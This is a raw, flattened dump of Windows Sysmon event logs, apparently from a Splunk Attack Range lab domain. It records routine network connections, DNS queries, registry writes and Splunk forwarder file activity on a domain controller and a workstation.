AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-542.attackrange.local59502-false10.0.1.12-8000- 23542300x8000000000000000980672Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:20:49.023{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A2EA39AA4E3ECE298CC5A9A17B309897,SHA256=CADC2E6E365CD222EE469E35ACD6BE1A88187E5C1C9CF05446FAD8E7621A7219,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001054744Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:48.871{5EBD8912-8CD0-6151-2A00-00000000FD01}2404C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudptruetrue0:0:0:0:0:0:0:1win-dc-429.attackrange.local56535-true0:0:0:0:0:0:0:1win-dc-429.attackrange.local56535- 354300x80000000000000001054743Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:48.860{5EBD8912-8CD0-6151-2A00-00000000FD01}2404C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-429.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-429.attackrange.local54908- 354300x80000000000000001054742Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:48.159{5EBD8912-8CBD-6151-0B00-00000000FD01}640C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetruefe80:0:0:0:65e5:9cae:dd2b:361bwin-dc-429.attackrange.local49722-truefe80:0:0:0:65e5:9cae:dd2b:361bwin-dc-429.attackrange.local49672- 354300x80000000000000001054741Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:48.159{5EBD8912-8CC0-6151-1600-00000000FD01}1296C:\Windows\System32\svchost.exeNT AUTHORITY\SYSTEMtcptruetruefe80:0:0:0:65e5:9cae:dd2b:361bwin-dc-429.attackrange.local49722-truefe80:0:0:0:65e5:9cae:dd2b:361bwin-dc-429.attackrange.local49672- 354300x80000000000000001054740Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:48.158{5EBD8912-8CBF-6151-0D00-00000000FD01}900C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsetruefe80:0:0:0:65e5:9cae:dd2b:361bwin-dc-429.attackrange.local49721-truefe80:0:0:0:65e5:9cae:dd2b:361bwin-dc-429.attackrange.local135epmap 354300x80000000000000001054739Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:48.157{5EBD8912-8CC0-6151-1600-00000000FD01}1296C:\Windows\System32\svchost.exeNT AUTHORITY\SYSTEMtcptruetruefe80:0:0:0:65e5:9cae:dd2b:361bwin-dc-429.attackrange.local49721-truefe80:0:0:0:65e5:9cae:dd2b:361bwin-dc-429.attackrange.local135epmap 354300x80000000000000001054738Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:47.704{5EBD8912-8CD0-6151-2A00-00000000FD01}2404C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-429.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-429.attackrange.local61555- 23542300x80000000000000001054737Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:49.870{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SystemMD5=3DA5E4C58EEDB92FA99B79813E1E9993,SHA256=D4A27E205AA412E08F0843812EF748FDA4ED17DDBB29965BB9A3C6EFEE6D6492,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001054736Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:49.870{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SystemMD5=5F99EA714345209B93A774437711BEF1,SHA256=09B10C8930FEDE74A8E08CF6A9BD21433C8CEE82E5D1F931253D00DAB6CCC8A4,IMPHASH=00000000000000000000000000000000falsetrue 22542200x80000000000000001054735Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:49.299{5EBD8912-8CBD-6151-0B00-00000000FD01}640_ldap._tcp.Default-First-Site-Name._sites.dc._msdcs.attackrange.local.0type: 33 ;10.0.1.14;C:\Windows\System32\lsass.exe 22542200x80000000000000001054734Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:49.160{5EBD8912-8CC0-6151-1600-00000000FD01}1296isatap.eu-central-1.compute.internal9003-C:\Windows\System32\svchost.exe 22542200x80000000000000001054733Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:49.154{5EBD8912-8CC0-6151-1400-00000000FD01}1040bomhrwbdppbk1460-C:\Windows\System32\svchost.exe 22542200x80000000000000001054732Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:48.961{5EBD8912-8CC0-6151-1400-00000000FD01}1040win-dc-429.attackrange.local0fe80::65e5:9cae:dd2b:361b;fe80::1807:197f:f5ff:fef1;::ffff:10.0.1.14;C:\Windows\System32\svchost.exe 22542200x80000000000000001054731Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:48.871{5EBD8912-8CC0-6151-1600-00000000FD01}1296win10.ipv6.microsoft.com.0type: 5 onpremwindows.ipv6.microsoft.com.akadns.net;type: 5 trdovmssukwest.ipv6.microsoft.com.akadns.net;40.81.120.44;C:\Windows\System32\svchost.exe 13241300x80000000000000001054730Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-SetValue2021-09-27 09:20:49.386{5EBD8912-8CC0-6151-1500-00000000FD01}1256C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\SharedAccess\Epoch\EpochDWORD (0x000007af) 13241300x80000000000000001054729Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-SetValue2021-09-27 09:20:49.292{5EBD8912-8CBD-6151-0B00-00000000FD01}640C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\Netlogon\Private\IPV6SocketAddressListBinary Data 13241300x80000000000000001054728Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-SetValue2021-09-27 09:20:49.292{5EBD8912-8CBD-6151-0B00-00000000FD01}640C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\Netlogon\Private\IPV6SocketAddressListBinary Data 23542300x80000000000000001054727Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:49.167{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=5CFEC9981ABD6FB79D79BBFB0D066824,SHA256=2E6CDDA4D5C92C296B2F00A45DE8DBC2521A0F64B473E772493857BB28435989,IMPHASH=00000000000000000000000000000000falsetrue 13241300x80000000000000001054726Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-SetValue2021-09-27 09:20:49.152{5EBD8912-8CC0-6151-1400-00000000FD01}1040C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Dnscache\Parameters\Probe\{97a9d540-17d1-423c-a727-394f22c703af}\NetworkPerformsHijackingDWORD (0x00000000) 13241300x80000000000000001054725Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-SetValue2021-09-27 09:20:49.152{5EBD8912-8CC0-6151-1400-00000000FD01}1040C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Dnscache\Parameters\Probe\{97a9d540-17d1-423c-a727-394f22c703af}\LastProbeTimeDWORD (0x61518cf1) 13241300x80000000000000001054724Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-SetValue2021-09-27 09:20:49.152{5EBD8912-8CC0-6151-1000-00000000FD01}440C:\Windows\system32\svchost.exeHKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkList\Profiles\{97A9D540-17D1-423C-A727-394F22C703AF}\DateLastConnectedBinary Data 734700x80000000000000001054723Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:49.058{5EBD8912-8CC0-6151-1400-00000000FD01}1040C:\Windows\System32\svchost.exeC:\Windows\System32\cryptdll.dll10.0.14393.2969 (rs1_release.190503-1820)Cryptography ManagerMicrosoft® Windows® Operating SystemMicrosoft Corporationcryptdll.dllMD5=4B31902F1E0B79CE7E46D9877647C1CC,SHA256=8925892119315293C49D09A26191149660934BF1E5D3D023722E90339ADA38AA,IMPHASH=CAB6D6025DF08B0D0BC6259D625E2778trueMicrosoft WindowsValid 23542300x80000000000000001054722Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:49.011{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F5C67307487DFF20AFC265798B18EE3F,SHA256=E2B3D577624B60073E1EE2290D754A58EE9FB233D729670C5A3870C760110C6E,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001054754Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:49.297{5EBD8912-8CD0-6151-2A00-00000000FD01}2404C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-429.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-429.attackrange.local56005- 22542200x80000000000000001054753Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:49.315{5EBD8912-8CC0-6151-1000-00000000FD01}440wpad9003-C:\Windows\System32\svchost.exe 354300x80000000000000001054752Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:49.297{5EBD8912-8CD0-6151-2A00-00000000FD01}2404C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-429.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-429.attackrange.local65251- 354300x80000000000000001054751Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:49.288{5EBD8912-8CD0-6151-2A00-00000000FD01}2404C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-429.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-429.attackrange.local50463- 13241300x80000000000000001054750Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-SetValue2021-09-27 09:20:50.292{5EBD8912-8CC0-6151-1500-00000000FD01}1256C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\SharedAccess\Epoch2\EpochDWORD (0x00000438) 354300x80000000000000001054749Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:49.142{5EBD8912-8CD0-6151-2A00-00000000FD01}2404C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-429.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-429.attackrange.local51301- 354300x80000000000000001054748Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:48.968{5EBD8912-8CC0-6151-1100-00000000FD01}412C:\Windows\System32\svchost.exeNT AUTHORITY\LOCAL SERVICEudptruetruefe80:0:0:0:1807:197f:f5ff:fef1-546dhcpv6-clienttrueff02:0:0:0:0:0:1:2-547dhcpv6-server 354300x80000000000000001054747Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:48.951{5EBD8912-8CBD-6151-0B00-00000000FD01}640C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsefalse10.0.1.14win-dc-429.attackrange.local49723-false10.0.1.14win-dc-429.attackrange.local389ldap 354300x80000000000000001054746Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:48.951{5EBD8912-8CC0-6151-1400-00000000FD01}1040C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcptruefalse10.0.1.14win-dc-429.attackrange.local49723-false10.0.1.14win-dc-429.attackrange.local389ldap 23542300x80000000000000001054745Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:50.027{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F360308FB368461059593CBA4D297E43,SHA256=79D6FC20CB8164ED72C2C3088D336191FE24F2D0058A8A2D7A2E798E71E66E3B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000980674Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:20:50.133{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=319B7425DE1C46C9ECB1CC36957007A4,SHA256=C2367ACAD8B7FE1D1297C5C40B08A1C422B9BF14314E807027831A474DE4BB58,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001054756Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:51.058{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A4B5236C02A53CB5BAF1552D69D2A932,SHA256=103A8D1DCEF9C39D522AF402D65541D69BAA572C4497E8616220E0CD210587BD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000980675Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:20:51.148{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=33A298676B10BE601A0022BA241AC8E8,SHA256=8FC41B191D32E89207C1F8CF5A22E678C5BB4CDC9F4B3BC6C369EAEF53A6FA53,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001054755Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:50.995{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=6887C6AE9A23517F31A66AA37062E159,SHA256=BA23D99E7F603A5A0201BD332BA27DE768E9B35DF6634E6703B5446C23930A96,IMPHASH=00000000000000000000000000000000falsetrue 22542200x80000000000000001054780Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:50.152{5EBD8912-8CC0-6151-1400-00000000FD01}1040win-dc-4291460-C:\Windows\System32\svchost.exe 13241300x80000000000000001054779Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-SetValue2021-09-27 09:20:52.324{5EBD8912-8CC0-6151-1400-00000000FD01}1040C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{539531AA-0A0B-4BBA-B26E-65076530B444}\RegisteredSinceBootDWORD (0x00000001) 13241300x80000000000000001054778Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-SetValue2021-09-27 09:20:52.324{5EBD8912-8CC0-6151-1400-00000000FD01}1040C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{539531AA-0A0B-4BBA-B26E-65076530B444}\StaleAdapterDWORD (0x00000000) 13241300x80000000000000001054777Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-SetValue2021-09-27 09:20:52.324{5EBD8912-8CC0-6151-1400-00000000FD01}1040C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{539531AA-0A0B-4BBA-B26E-65076530B444}\CompartmentIdDWORD (0x00000001) 13241300x80000000000000001054776Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-SetValue2021-09-27 09:20:52.324{5EBD8912-8CC0-6151-1400-00000000FD01}1040C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{539531AA-0A0B-4BBA-B26E-65076530B444}\FlagsDWORD (0x00000002) 13241300x80000000000000001054775Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-SetValue2021-09-27 09:20:52.324{5EBD8912-8CC0-6151-1400-00000000FD01}1040C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{539531AA-0A0B-4BBA-B26E-65076530B444}\TtlDWORD (0x000004b0) 13241300x80000000000000001054774Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-SetValue2021-09-27 09:20:52.324{5EBD8912-8CC0-6151-1400-00000000FD01}1040C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{539531AA-0A0B-4BBA-B26E-65076530B444}\SentPriUpdateToIpBinary Data 13241300x80000000000000001054773Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-SetValue2021-09-27 09:20:52.324{5EBD8912-8CC0-6151-1400-00000000FD01}1040C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{539531AA-0A0B-4BBA-B26E-65076530B444}\SentUpdateToIpBinary Data 13241300x80000000000000001054772Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-SetValue2021-09-27 09:20:52.324{5EBD8912-8CC0-6151-1400-00000000FD01}1040C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{539531AA-0A0B-4BBA-B26E-65076530B444}\DnsServersBinary Data 13241300x80000000000000001054771Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-SetValue2021-09-27 09:20:52.324{5EBD8912-8CC0-6151-1400-00000000FD01}1040C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{539531AA-0A0B-4BBA-B26E-65076530B444}\HostAddrsBinary Data 13241300x80000000000000001054770Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-SetValue2021-09-27 09:20:52.324{5EBD8912-8CC0-6151-1400-00000000FD01}1040C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{539531AA-0A0B-4BBA-B26E-65076530B444}\PrimaryDomainNameattackrange.local 13241300x80000000000000001054769Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-SetValue2021-09-27 09:20:52.324{5EBD8912-8CC0-6151-1400-00000000FD01}1040C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{539531AA-0A0B-4BBA-B26E-65076530B444}\AdapterDomainName(Empty) 13241300x80000000000000001054768Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-SetValue2021-09-27 09:20:52.324{5EBD8912-8CC0-6151-1400-00000000FD01}1040C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{539531AA-0A0B-4BBA-B26E-65076530B444}\Hostnamewin-dc-429 10341000x80000000000000001054767Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:52.308{5EBD8912-8CBD-6151-0B00-00000000FD01}6402732C:\Windows\system32\lsass.exe{5EBD8912-8CC0-6151-1400-00000000FD01}1040C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\kerberos.DLL+96ef2|C:\Windows\system32\kerberos.DLL+793e4|C:\Windows\system32\kerberos.DLL+1443f|C:\Windows\system32\lsasrv.dll+2d211|C:\Windows\system32\lsasrv.dll+2b3d4|C:\Windows\system32\lsasrv.dll+30485|C:\Windows\system32\lsasrv.dll+2e31b|C:\Windows\system32\lsasrv.dll+2d211|C:\Windows\system32\lsasrv.dll+15ded|C:\Windows\SYSTEM32\SspiSrv.dll+1a96|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e 13241300x80000000000000001054766Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-SetValue2021-09-27 09:20:52.308{5EBD8912-8CC0-6151-1400-00000000FD01}1040C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{539531AA-0A0B-4BBA-B26E-65076530B444}\RegisteredSinceBootDWORD (0x00000001) 23542300x80000000000000001054765Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:52.183{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=64A8B17E0541F55EBB6314329570EA2A,SHA256=81120E7C0AF0C93BED47FCB6D99C6FAB72F58A287A4BEA06007481D4E895407C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000980676Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:20:52.148{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8B8704F175F6FDBF64970AEDE33F3215,SHA256=728F5334FE15FC6F8857CAFC776F28B5B9B3AB8D5F294D89333F8F126F8B507D,IMPHASH=00000000000000000000000000000000falsetrue 13241300x80000000000000001054764Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-SetValue2021-09-27 09:20:52.152{5EBD8912-8CBD-6151-0B00-00000000FD01}640C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\Netlogon\Private\IPV6SocketAddressListBinary Data 13241300x80000000000000001054763Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-SetValue2021-09-27 09:20:52.152{5EBD8912-8CC0-6151-1600-00000000FD01}1296C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\MpsSvc\Parameters\PortKeywords\Teredo\CollectionBinary Data 13241300x80000000000000001054762Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-SetValue2021-09-27 09:20:52.152{5EBD8912-8CC0-6151-1600-00000000FD01}1296C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\MpsSvc\Parameters\PortKeywords\Teredo\CollectionBinary Data 13241300x80000000000000001054761Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-SetValue2021-09-27 09:20:52.152{5EBD8912-8CBD-6151-0B00-00000000FD01}640C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\Netlogon\Private\IPV6SocketAddressListBinary Data 23542300x80000000000000001054760Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:52.074{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=DCA93D49A2DD75DB367E28E3AF9E3F1F,SHA256=7EB6F545EFC1CB92D6F4D3B74B61DF150F4A5396F46383505E3DC5F67015456A,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001054759Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:49.735{5EBD8912-8CD0-6151-2A00-00000000FD01}2404C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-429.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-429.attackrange.local53062- 354300x80000000000000001054758Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:49.693{5EBD8912-8CC0-6151-0F00-00000000FD01}300C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.231-63632-false10.0.1.14win-dc-429.attackrange.local3389ms-wbt-server 354300x80000000000000001054757Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:49.375{5EBD8912-8CC0-6151-1000-00000000FD01}440C:\Windows\System32\svchost.exeNT AUTHORITY\LOCAL SERVICEudptruefalse10.0.1.14win-dc-429.attackrange.local123ntpfalse20.101.57.9-123ntp 354300x80000000000000001054792Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:52.313{5EBD8912-8CBD-6151-0B00-00000000FD01}640C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetrue0:0:0:0:0:0:0:1win-dc-429.attackrange.local54186-true0:0:0:0:0:0:0:1win-dc-429.attackrange.local389ldap 354300x80000000000000001054791Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:52.313{5EBD8912-8CD0-6151-2A00-00000000FD01}2404C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMtcptruetrue0:0:0:0:0:0:0:1win-dc-429.attackrange.local54186-true0:0:0:0:0:0:0:1win-dc-429.attackrange.local389ldap 23542300x80000000000000001054790Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:53.417{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FE534B543730738DC870F5EFB5530E04,SHA256=3203BA9FB6C0DEDA552FD68A94213107CA313AE8DBE48510CAE38F8C8ED55C44,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000980681Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:20:50.048{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.230-60257-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 354300x8000000000000000980680Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:20:49.882{69CF5F33-7F33-614D-6600-00000000FD01}4076C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-542.attackrange.local59503-false10.0.1.12-8000- 23542300x8000000000000000980679Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:20:53.195{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=38BDBE3AF5399E8FB2FF7D5799555C48,SHA256=643C75634164B0AEC88149CA62932CD45FBB96AEC67A6F08589E0F9D0598E1EA,IMPHASH=00000000000000000000000000000000falsetrue 